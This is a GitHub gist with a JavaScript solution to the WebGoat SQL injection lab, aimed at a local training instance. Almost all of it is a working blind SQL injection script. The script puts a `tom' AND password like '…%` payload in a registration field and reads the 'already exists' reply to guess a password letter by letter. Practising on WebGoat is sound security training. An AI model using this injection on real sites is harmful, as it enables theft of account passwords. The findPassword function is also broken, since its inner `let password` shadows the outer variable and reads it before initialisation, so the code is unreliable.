Created
June 24, 2022 14:10
-
-
Save hendrixjoseph/55d614d15996a228bf722f62eb2b7a3b to your computer and use it in GitHub Desktop.
WebGoat SQL Injection Lesson 5 Solution
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
let findNextLetter = async function(password) { | |
if(!password) { | |
password = "" | |
} | |
for (let letter = 'a'; letter <= 'z'; letter = String.fromCharCode(letter.charCodeAt(0)+1)) { | |
let newPassword = password + letter; | |
let response = await fetch("http://localhost:8080/WebGoat/SqlInjectionAdvanced/challenge", { | |
"headers": { | |
"accept": "*/*", | |
"accept-language": "en-US,en;q=0.9", | |
"content-type": "application/x-www-form-urlencoded; charset=UTF-8", | |
"sec-fetch-dest": "empty", | |
"sec-fetch-mode": "cors", | |
"sec-fetch-site": "same-origin", | |
"sec-gpc": "1", | |
"x-requested-with": "XMLHttpRequest" | |
}, | |
"referrer": "http://localhost:8080/WebGoat/start.mvc", | |
"referrerPolicy": "strict-origin-when-cross-origin", | |
"body": `username_reg=tom'+AND+password+like+'${newPassword}%25&email_reg=hendrixjoseph%40aol.com&password_reg=pw&confirm_password_reg=pw`, | |
"method": "PUT", | |
"mode": "cors", | |
"credentials": "include" | |
}); | |
let json = await response.json(); | |
if (json.feedback.includes('already exists')) { | |
return newPassword; | |
} | |
} | |
} | |
let findPassword = async function(size, start) { | |
let password = start; | |
if(!size) { | |
size = 10; | |
} | |
for (let i = 0; i < size; i = i + 1) { | |
let password = await findNextLetter(password); | |
console.log(password); | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment